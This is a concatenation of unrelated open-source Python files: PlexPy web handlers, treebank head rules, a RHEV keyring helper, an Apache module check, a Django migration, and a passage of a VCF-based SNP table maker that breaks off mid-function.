    @cherrypy.expose
    def get_recently_added(self, count='0', **kwargs):
        """Render up to `count` recently-added items; empty state on IOError."""
        try:
            pms_connect = pmsconnect.PmsConnect()
            result = pms_connect.get_recently_added_details(count)
        except IOError, e:
            return serve_template(templatename="recently_added.html", data=None)

        if result:
            return serve_template(templatename="recently_added.html", data=result['recently_added'])
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="recently_added.html", data=None)

    @cherrypy.expose
    def pms_image_proxy(self, img='', width='0', height='0', fallback=None, **kwargs):
        """Proxy an image from the PMS; on error, serve a local fallback thumb.

        `fallback` selects the substitute image ('poster' or 'cover').
        """
        try:
            pms_connect = pmsconnect.PmsConnect()
            result = pms_connect.get_image(img, width, height)
            cherrypy.response.headers['Content-type'] = result[1]
            return result[0]
        except:
            logger.warn('Image proxy queried but errors occured.')
            if fallback == 'poster':
                logger.info('Trying fallback image...')
                try:
                    # NOTE(review): file handle is returned without being closed;
                    # cherrypy streams it, but the descriptor lifetime is implicit.
                    fallback_image = open(self.interface_dir + common.DEFAULT_POSTER_THUMB, 'rb')
                    cherrypy.response.headers['Content-type'] = 'image/png'
                    return fallback_image
                except IOError, e:
                    logger.error('Unable to read fallback image. %s' % e)
            elif fallback == 'cover':
                logger.info('Trying fallback image...')
                try:
                    fallback_image = open(self.interface_dir + common.DEFAULT_COVER_THUMB, 'rb')
                    cherrypy.response.headers['Content-type'] = 'image/png'
                    return fallback_image
                except IOError, e:
                    logger.error('Unable to read fallback image. %s' % e)

            return None

    @cherrypy.expose
    def info(self, item_id=None, source=None, **kwargs):
        """Render metadata for an item, from history rows or live from the PMS."""
        metadata = None

        config = {
            "pms_identifier": plexpy.CONFIG.PMS_IDENTIFIER
        }

        if source == 'history':
            data_factory = datafactory.DataFactory()
            metadata = data_factory.get_metadata_details(row_id=item_id)
        else:
            pms_connect = pmsconnect.PmsConnect()
            result = pms_connect.get_metadata_details(rating_key=item_id)
            if result:
                metadata = result['metadata']

        if metadata:
            return serve_template(templatename="info.html", data=metadata, title="Info", config=config)
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="info.html", data=None, title="Info")

    @cherrypy.expose
    def get_user_recently_watched(self, user=None, user_id=None, limit='10', **kwargs):
        """Render a user's recently watched items (up to `limit`)."""
        data_factory = datafactory.DataFactory()
        result = data_factory.get_recently_watched(user_id=user_id, user=user, limit=limit)

        if result:
            return serve_template(templatename="user_recently_watched.html", data=result,
                                  title="Recently Watched")
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="user_recently_watched.html", data=None,
                                  title="Recently Watched")

    @cherrypy.expose
    def get_user_watch_time_stats(self, user=None, user_id=None, **kwargs):
        """Render watch-time statistics for a user."""
        user_data = users.Users()
        result = user_data.get_user_watch_time_stats(user_id=user_id, user=user)

        if result:
            return serve_template(templatename="user_watch_time_stats.html", data=result,
                                  title="Watch Stats")
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="user_watch_time_stats.html", data=None,
                                  title="Watch Stats")

    @cherrypy.expose
    def get_user_platform_stats(self, user=None, user_id=None, **kwargs):
        """Render platform-usage statistics for a user."""
        user_data = users.Users()
        result = user_data.get_user_platform_stats(user_id=user_id, user=user)

        if result:
            return serve_template(templatename="user_platform_stats.html", data=result,
                                  title="Platform Stats")
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="user_platform_stats.html", data=None,
                                  title="Platform Stats")

    @cherrypy.expose
    def get_item_children(self, rating_key='', **kwargs):
        """Render the child-item list (e.g. episodes of a season) for a rating key."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_item_children(rating_key)

        if result:
            return serve_template(templatename="info_children_list.html", data=result,
                                  title="Children List")
        else:
            logger.warn('Unable to retrieve data.')
            return serve_template(templatename="info_children_list.html", data=None,
                                  title="Children List")

    @cherrypy.expose
    def get_metadata_json(self, rating_key='', **kwargs):
        """Return raw PMS metadata for a rating key as JSON (nothing on failure)."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_metadata(rating_key, 'json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_metadata_xml(self, rating_key='', **kwargs):
        """Return raw PMS metadata for a rating key as XML (nothing on failure)."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_metadata(rating_key)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/xml'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_recently_added_json(self, count='0', **kwargs):
        """Return up to `count` recently-added items as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_recently_added(count, 'json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_episode_list_json(self, rating_key='', **kwargs):
        """Return the episode list for a show/season rating key as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_episode_list(rating_key, 'json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_user_ips(self, user_id=None, user=None, **kwargs):
        """Return the unique IP addresses seen for a user as JSON (DataTables feed)."""
        custom_where=[]
        if user_id:
            custom_where = [['user_id', user_id]]
        elif user:
            custom_where = [['user', user]]

        user_data = users.Users()
        history = user_data.get_user_unique_ips(kwargs=kwargs, custom_where=custom_where)

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(history)

    # --- Graph endpoints: each returns a JSON series for one chart. ---
    # `time_range` is a day count (string); `y_axis` selects plays vs duration.

    @cherrypy.expose
    def get_plays_by_date(self, time_range='30', y_axis='plays', **kwargs):
        """Plays per calendar day over the given range."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_per_day(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_dayofweek(self, time_range='30', y_axis='plays', **kwargs):
        """Plays grouped by day of week."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_per_dayofweek(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_hourofday(self, time_range='30', y_axis='plays', **kwargs):
        """Plays grouped by hour of day."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_per_hourofday(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_per_month(self, y_axis='plays', **kwargs):
        """Plays per month (no time_range parameter for this chart)."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_per_month(y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
        """Plays for the ten most active platforms."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_by_top_10_platforms(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
        """Plays for the ten most active users."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_by_top_10_users(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_stream_type(self, time_range='30', y_axis='plays', **kwargs):
        """Plays split by stream type (direct play / direct stream / transcode)."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_per_stream_type(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_source_resolution(self, time_range='30', y_axis='plays', **kwargs):
        """Plays split by source media resolution."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_by_source_resolution(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plays_by_stream_resolution(self, time_range='30', y_axis='plays', **kwargs):
        """Plays split by delivered stream resolution."""
        graph = graphs.Graphs()
        result = graph.get_total_plays_by_stream_resolution(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_stream_type_by_top_10_users(self, time_range='30', y_axis='plays', **kwargs):
        """Stream-type breakdown for the ten most active users."""
        graph = graphs.Graphs()
        result = graph.get_stream_type_by_top_10_users(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_stream_type_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
        """Stream-type breakdown for the ten most active platforms."""
        graph = graphs.Graphs()
        result = graph.get_stream_type_by_top_10_platforms(time_range=time_range, y_axis=y_axis)

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_friends_list(self, **kwargs):
        """Return the Plex.tv friends list as JSON."""
        plex_tv = plextv.PlexTV()
        result = plex_tv.get_plextv_friends('json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_user_details(self, **kwargs):
        """Return the Plex.tv account details of the configured user as JSON."""
        plex_tv = plextv.PlexTV()
        result = plex_tv.get_plextv_user_details('json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_server_list(self, **kwargs):
        """Return the Plex.tv server list as JSON."""
        plex_tv = plextv.PlexTV()
        result = plex_tv.get_plextv_server_list('json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_sync_lists(self, machine_id='', **kwargs):
        """Return Plex.tv sync lists for a server (by machine identifier) as JSON."""
        plex_tv = plextv.PlexTV()
        result = plex_tv.get_plextv_sync_lists(machine_id=machine_id, output_format='json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_servers(self, **kwargs):
        """Return the server list as seen by the PMS itself, as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_server_list(output_format='json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_servers_info(self, **kwargs):
        """Return parsed server info (already a Python structure) JSON-encoded."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_servers_info()

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_server_prefs(self, **kwargs):
        """Return all PMS preferences as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_server_prefs(output_format='json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_activity(self, **kwargs):
        """Return current activity as JSON (data form of get_current_activity)."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_current_activity()

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_full_users_list(self, **kwargs):
        """Return the merged Plex.tv users list as JSON."""
        plex_tv = plextv.PlexTV()
        result = plex_tv.get_full_users_list()

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps(result)
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def refresh_users_list(self, **kwargs):
        """Kick off a background refresh of the users table; returns nothing."""
        threading.Thread(target=plextv.refresh_users).start()
        logger.info('Manual user list refresh requested.')

    @cherrypy.expose
    def get_sync(self, machine_id=None, user_id=None, **kwargs):
        """Return synced items for a server/user as JSON (defaults to this server)."""
        pms_connect = pmsconnect.PmsConnect()
        server_id = pms_connect.get_server_identity()

        plex_tv = plextv.PlexTV()
        if not machine_id:
            # No explicit server given: fall back to the connected PMS's identity.
            result = plex_tv.get_synced_items(machine_id=server_id['machine_identifier'], user_id=user_id)
        else:
            result = plex_tv.get_synced_items(machine_id=machine_id, user_id=user_id)

        if result:
            output = {"data": result}
        else:
            logger.warn('Unable to retrieve sync data for user.')
            output = {"data": []}

        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps(output)

    @cherrypy.expose
    def get_sync_item(self, sync_id, **kwargs):
        """Return one sync item by id as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_sync_item(sync_id, output_format='json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_sync_transcode_queue(self, **kwargs):
        """Return the sync transcode queue as JSON."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_sync_transcode_queue(output_format='json')

        if result:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_server_pref(self, pref=None, **kwargs):
        """Return a single PMS preference value (raw, no content-type set)."""
        pms_connect = pmsconnect.PmsConnect()
        result = pms_connect.get_server_pref(pref=pref)

        if result:
            return result
        else:
            logger.warn('Unable to retrieve data.')

    @cherrypy.expose
    def get_plexwatch_export_data(self, database_path=None, table_name=None, import_ignore_interval=0, **kwargs):
        """Validate a PlexWatch DB and, if valid, import it in a background thread."""
        from plexpy import plexwatch_import

        db_check_msg = plexwatch_import.validate_database(database=database_path,
                                                          table_name=table_name)
        if db_check_msg == 'success':
            # Import can be long-running; do it off the request thread.
            threading.Thread(target=plexwatch_import.import_from_plexwatch,
                             kwargs={'database': database_path,
                                     'table_name': table_name,
                                     'import_ignore_interval': import_ignore_interval}).start()
            return 'Import has started. Check the PlexPy logs to monitor any problems.'
        else:
            # Validation failed: surface the validator's message to the caller.
            return db_check_msg

    @cherrypy.expose
    def plexwatch_import(self, **kwargs):
        """Render the PlexWatch import page."""
        return serve_template(templatename="plexwatch_import.html", title="Import PlexWatch Database")

    @cherrypy.expose
    def get_server_id(self, hostname=None, port=None, **kwargs):
        """Query a PMS's /identity endpoint (no auth token) and return the XML."""
        from plexpy import http_handler

        if hostname and port:
            request_handler = http_handler.HTTPHandler(host=hostname,
                                                       port=port,
                                                       token=None)
            uri = '/identity'
            request = request_handler.make_request(uri=uri,
                                                   proto='http',
                                                   request_type='GET',
                                                   output_format='',
                                                   no_token=True)
            if request:
                cherrypy.response.headers['Content-type'] = 'application/xml'
                return request
            else:
                logger.warn('Unable to retrieve data.')
                return None
        else:
            return None

    @cherrypy.expose
    def random_arnold_quotes(self, **kwargs):
        """Return a random Arnold Schwarzenegger quote (used on shutdown pages)."""
        from random import randint
        quote_list = ['To crush your enemies, see them driven before you, and to hear the lamentation of their women!',
                      'Your clothes, give them to me, now!',
                      'Do it!',
                      'If it bleeds, we can kill it',
                      'See you at the party Richter!',
                      'Let off some steam, Bennett',
                      'I\'ll be back',
                      'Get to the chopper!',
                      'Hasta La Vista, Baby!',
                      'It\'s not a tumor!',
                      'Dillon, you son of a bitch!',
                      'Benny!! Screw you!!',
                      'Stop whining! You kids are soft. You lack discipline.',
                      'Nice night for a walk.',
                      'Stick around!',
                      'I need your clothes, your boots and your motorcycle.',
                      'No, it\'s not a tumor. It\'s not a tumor!',
                      'I LIED!',
                      'See you at the party, Richter!',
                      'Are you Sarah Conner?',
                      'I\'m a cop you idiot!',
                      'Come with me if you want to live.',
                      'Who is your daddy and what does he do?'
                      ]

        random_number = randint(0, len(quote_list) - 1)
        return quote_list[int(random_number)]

    @cherrypy.expose
    def get_notification_agent_config(self, config_id, **kwargs):
        """Render the configuration form for one notification agent."""
        config = notifiers.get_notification_agent_config(config_id=config_id)

        checkboxes = {'email_tls': checked(plexpy.CONFIG.EMAIL_TLS)}

        return serve_template(templatename="notification_config.html", title="Notification Configuration",
                              data=config, checkboxes=checkboxes)

    @cherrypy.expose
    def get_notification_agent_triggers(self, config_id, **kwargs):
        """Render the trigger modal for the agent with the given numeric id."""
        if config_id.isdigit():
            agents = notifiers.available_notification_agents()
            for agent in agents:
                if int(config_id) == agent['id']:
                    this_agent = agent
                    break
            else:
                # for/else: loop completed without break -> no matching agent.
                this_agent = None
        else:
            return None

        return serve_template(templatename="notification_triggers_modal.html",
                              title="Notification Triggers",
                              data=this_agent)

    @cherrypy.expose
    def delete_history_rows(self, row_id, **kwargs):
        """Delete one session-history row; returns a JSON status message."""
        data_factory = datafactory.DataFactory()

        if row_id:
            delete_row = data_factory.delete_session_history_rows(row_id=row_id)

            if delete_row:
                cherrypy.response.headers['Content-type'] = 'application/json'
                return json.dumps({'message': delete_row})
        else:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps({'message': 'no data received'})

    @cherrypy.expose
    def delete_all_user_history(self, user_id, **kwargs):
        """Delete all history rows for one user; returns a JSON status message."""
        data_factory = datafactory.DataFactory()

        if user_id:
            delete_row = data_factory.delete_all_user_history(user_id=user_id)

            if delete_row:
                cherrypy.response.headers['Content-type'] = 'application/json'
                return json.dumps({'message': delete_row})
        else:
            cherrypy.response.headers['Content-type'] = 'application/json'
            return json.dumps({'message': 'no data received'})
wmaier/treetools
trees/transformconst.py
"""treetools: Tools for transforming treebank trees. transformations: constants and utilities Author: Wolfgang Maier <maierw@hhu.de> """ from . import trees # Head rules for PTB (WSJ) from Collins (1999, p. 240) HEAD_RULES_PTB = { 'adjp' : [('left-to-right', 'nns qp nn $ advp jj vbn vbg adjp jjr np jjs dt fw rbr rbs sbar rb')], 'advp' : [('right-to-left', 'rb rbr rbs fw advp to cd jjr jj in np jjs nn')], 'conjp' : [('right-to-left', 'cc rb in')], 'frag' : [('right-to-left', '')], 'intj' : [('left-to-right', '')], 'lst' : [('right-to-left', 'ls :')], 'nac' : [('left-to-right', 'nn nns nnp nnps np nac ex $ cd qp prp vbg jj jjs jjr adjp fw')], 'pp' : [('right-to-left', 'in to vbg vbn rp fw')], 'prn' : [('left-to-right', '')], 'prt' : [('right-to-left', 'rp')], 'qp' : [('left-to-right', ' $ in nns nn jj rb dt cd ncd qp jjr jjs')], 'rrc' : [('right-to-left', 'vp np advp adjp pp')], 's' : [('left-to-right', ' to in vp s sbar adjp ucp np')], 'sbar' : [('left-to-right', 'whnp whpp whadvp whadjp in dt s sq sinv sbar frag')], 'sbarq' : [('left-to-right', 'sq s sinv sbarq frag')], 'sinv' : [('left-to-right', 'vbz vbd vbp vb md vp s sinv adjp np')], 'sq' : [('left-to-right', 'vbz vbd vbp vb md vp sq')], 'ucp' : [('right-to-left', '')], 'vp' : [('left-to-right', 'to vbd vbn md vbz vb vbg vbp vp adjp nn nns np')], 'whadjp' : [('left-to-right', 'cc wrb jj adjp')], 'whadvp' : [('right-to-left', 'cc wrb')], 'whnp' : [('left-to-right', 'wdt wp wp$ whadjp whpp whnp')], 'whpp' : [('right-to-left', 'in to fw')] } # Head rules for NeGra/TIGER from rparse # almost identical to corresponding rules from Stanford parser HEAD_RULES_NEGRA = { 's' : [('right-to-left', 'vvfin vvimp'), ('right-to-left', 'vp cvp'), ('right-to-left', 'vmfin vafin vaimp'), ('right-to-left', 's cs')], 'vp' : [('right-to-left', 'vvinf vvizu vvpp'), ('right-to-left', 'vz vainf vminf vmpp vapp pp')], 'vz' : [('right-to-left', 'vvinf vainf vminf vvfin vvizu'), ('left-to-right', 'prtzu appr ptkzu')], 'np' : 
[('right-to-left', 'nn ne mpn np cnp pn car')], 'ap' : [('right-to-left', 'adjd adja cap aa adv')], 'pp' : [('left-to-right', 'kokom appr proav')], 'co' : [('left-to-right', '')], 'avp' : [('right-to-left', 'adv avp adjd proav pp')], 'aa' : [('right-to-left', 'adjd adja')], 'cnp' : [('right-to-left', 'nn ne mpn np cnp pn car')], 'cap' : [('right-to-left', 'adjd adja cap aa adv')], 'cpp' : [('right-to-left', 'appr proav pp cpp')], 'cs' : [('right-to-left', 's cs')], 'cvp' : [('right-to-left', 'vz')], 'cvz' : [('right-to-left', 'vz')], 'cavp' : [('right-to-left', 'adv avp adjd pwav appr ptkvz')], 'mpn' : [('right-to-left', 'ne fm card')], 'nm' : [('right-to-left', 'card nn')], 'cac' : [('right-to-left', 'appr avp')], 'ch' : [('right-to-left', '')], 'mta' : [('right-to-left', 'adja adjd nn')], 'ccp' : [('right-to-left', 'avp')], 'dl' : [('left-to-right', '')], 'isu' : [('right-to-left', '')], 'ql' : [('right-to-left', '')], '-' : [('right-to-left', 'pp')], 'cd' : [('right-to-left', 'cd')], 'nn' : [('right-to-left', 'nn')], 'nr' : [('right-to-left', 'nr')], 'vroot' : [('left-to-right', '$. $')] } def get_headpos_by_rule(parent_label, children_label, rules, default=0): """Given parent and children labels and head rules, return position of lexical head. 
""" if not parent_label.lower() in rules: return default for hrule in rules[parent_label.lower()]: if len(hrule[1]) == 0: if hrule[0] == 'left-to-right': return len(children_label) - 1 elif hrule[0] == 'right-to_left': return 0 else: raise ValueError("unknown head rule direction") for label in hrule[1]: if hrule[0] == 'left-to-right': for i, child_label in enumerate(children_label): parsed_label = trees.parse_label(child_label.lower()) if parsed_label.label.lower() == label: return i elif hrule[0] == 'right-to-left': for i, child_label in \ zip(reversed(range(len(children_label))), reversed(children_label)): parsed_label = trees.parse_label(child_label.lower()) if parsed_label.label.lower() == label: return i return 0 else: raise ValueError("unknown head rule direction") return 0
DragonRoman/rhevm-utils
rhev-keyring.py
#!/usr/bin/env python # # Author: Pablo Iranzo Gomez (Pablo.Iranzo@redhat.com) # # Description: Script for setting the keyring password for RHEV scripts # # Requires: python keyring # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. import optparse import keyring from rhev_functions import * description = """ RHEV-keyring is a script for mantaining the keyring used by rhev script for storing password """ # Option parsing p = optparse.OptionParser("rhev-clone.py [arguments]", description=description) p.add_option("-u", "--user", dest="username", help="Username to connect to RHEVM API", metavar="admin@internal", default=False) p.add_option("-w", "--password", dest="password", help="Password to use with username", metavar="admin", default=False) p.add_option("-W", action="store_true", dest="askpassword", help="Ask for password", metavar="admin", default=False) p.add_option('-q', "--query", action="store_true", dest="query", help="Query the values stored", default=False) (options, args) = p.parse_args() if options.askpassword: options.password = getpass.getpass("Enter password: ") # keyring.set_password('redhat', 'kerberos', '<password>') # remotepasseval = keyring.get_password('redhat', 'kerberos') if options.query: print "Username: %s" % keyring.get_password('rhevm-utils', 'username') print "Password: %s" % keyring.get_password('rhevm-utils', 'password') if options.username: keyring.set_password('rhevm-utils', 'username', options.username) if options.password: keyring.set_password('rhevm-utils', 'password', options.password)
sujith7c/py-system-tools
en_mod_rw.py
#!/usr/bin/python import os,sys,re #Check the OS Version RELEASE_FILE = "/etc/redhat-release" RWM_FILE = "/etc/httpd/conf.modules.d/00-base.conf" if os.path.isfile(RELEASE_FILE): f=open(RELEASE_FILE,"r") rel_list = f.read().split() if rel_list[2] == "release" and tuple(rel_list[3].split(".")) < ('8','5'): print("so far good") else: raise("Unable to find the OS version") #Check Apache installed #TODO # #Test if the rewrite module file present if os.path.isfile(RWM_FILE): print("re write") ##print sys.version_info ##if sys.version_info < (2,7): ## print "This programm works only with the Python 2.7"###
Gatomlo/shareandplay
catalogue/migrations/0015_auto_20170415_1628.py
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-15 14:28 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('catalogue', '0014_auto_20170414_0845'), ] operations = [ migrations.AlterField( model_name='jeux', name='image', field=models.ImageField(null=True, upload_to='photos_jeux/', verbose_name='Image'), ), ]
OLF-Bioinformatics/snp_analysis
binaries/snpTableMaker.py
#!/usr/bin/env python import os import random __author__ = 'duceppemo' class SnpTableMaker(object): """ Everything is ran inside the class because data structures have to be shared across parent and child process during multi threading """ def __init__(self, args): import os import sys import glob import multiprocessing # Define variables based on supplied arguments self.args = args self.ref = args.ref if not os.path.isfile(self.ref): sys.exit('Supplied reference genome file does not exists.') self.vcf = args.vcf if not os.path.isdir(self.vcf): sys.exit('Supplied VCF folder does not exists.') self.minQUAL = args.minQUAL if not isinstance(self.minQUAL, (int, long)): sys.exit('minQual value must be an integer') self.ac1_report = args.ac1 self.section4 = args.section4 self.output = args.output if not os.path.isdir(self.output): os.makedirs(self.output) self.table = args.table # number of threads to use = number of cpu self.cpus = int(multiprocessing.cpu_count()) # create dictionaries to hold data self.refgenome = dict() self.vcfs = dict() self.ac1s = dict() self.ac2s = dict() self.allac2 = dict() self.finalac1 = dict() self.fastas = dict() self.counts = dict() self.informative_pos = dict() # create a list of vcf files in vcfFolder self.vcfList = list() for filename in glob.glob(os.path.join(self.vcf, '*.vcf')): self.vcfList.append(filename) # run the script self.snp_table_maker() def snp_table_maker(self): self.parse_ref() self.parse_vcf() self.find_ac1_in_ac2() self.write_ac1_report() self.get_allele_values() self.get_informative_snps() self.count_snps() self.write_fasta() self.write_root() self.write_snp_table() def parse_ref(self): from Bio import SeqIO print ' Parsing reference genome' fh = open(self.ref, "rU") self.refgenome = SeqIO.to_dict(SeqIO.parse(fh, "fasta")) fh.close() def parse_vcf(self): import sys print ' Parsing VCF files' for samplefile in self.vcfList: sample = os.path.basename(samplefile).split('.')[0] # get what's before the first dot 
self.vcfs[sample] = dict() with open(samplefile, 'r') as f: # open file for line in f: # read file line by line line = line.rstrip() # chomp -> remove trailing whitespace characters if line: # skip blank lines or lines with only whitespaces if line.startswith('##'): # skip comment lines continue elif line.startswith('#CHROM'): sample_name = line.split("\t")[9] if sample_name != sample: sys.exit('File name and sample name inside VCF file are different: %s' % samplefile) else: # chrom, pos, alt, qual = [line.split()[i] for i in (0, 1, 4, 5)] chrom = line.split()[0] pos = int(line.split()[1]) alt = line.split()[4] qual = line.split()[5] # string -> needs to be converted to integer if qual != '.': try: qual = float(qual) except ValueError: qual = int(qual) else: continue # skip line ac = line.split()[7].split(';')[0] # http://www.saltycrane.com/blog/2010/02/python-setdefault-example/ self.vcfs.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, [])\ .append(alt) if ac == 'AC=1' and qual > self.args.minQUAL: self.ac1s.setdefault(sample, {}).setdefault(chrom, []).append(pos) elif ac == 'AC=2' and qual > self.args.minQUAL: self.ac2s.setdefault(sample, {}).setdefault(chrom, []).append(pos) # This is equivalent, but faster? 
try: if pos not in self.allac2[chrom]: # only add is not already present self.allac2.setdefault(chrom, []).append(pos) except KeyError: # chromosome does not exist in dictionary self.allac2.setdefault(chrom, []).append(pos) # This works # if chrom in self.allac2: # if pos in self.allac2[chrom]: # pass # else: # self.allac2.setdefault(chrom, []).append(pos) # else: # self.allac2.setdefault(chrom, []) def find_ac1_in_ac2(self): print ' Finding AC=1/AC=2 positions' if isinstance(self.ac1s, dict): # check if it's a dict before using .iteritems() for sample, chromosomes in self.ac1s.iteritems(): if isinstance(chromosomes, dict): # check for dict for chrom, positions in chromosomes.iteritems(): if isinstance(positions, list): # check for list for pos in positions: if pos in self.allac2[chrom]: # check ac1 in ac2 self.finalac1.setdefault(sample, {}).setdefault(chrom, []).append(pos) def write_ac1_report(self): print " Writing AC=1/AC=2 report to file" # free up resources not needed anymore self.ac1s.clear() fh = open(self.ac1_report, 'w') if isinstance(self.finalac1, dict): for sample, chromosomes in sorted(self.finalac1.iteritems()): if isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, list): fh.write("{}\nAC=1 is also found in AC=2 in chromosome {}".format(sample, chrom) + " at position(s): " + ', '.join(map(str, positions)) + "\n\n") fh.close() def get_allele_values(self): print ' Getting allele values' for sample in self.ac2s: for chrom in self.ac2s[sample]: for pos in self.allac2[chrom]: # if in AC=2 for that sample if pos in self.ac2s[sample][chrom]: allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string else: try: # use a try here because some samples are not in finalac1 # if in AC=1 for that sample, but also in AC=2 in other sample if pos in self.finalac1[sample][chrom]: allele = ''.join(self.vcfs[sample][chrom][pos]) # convert list to string else: allele = 
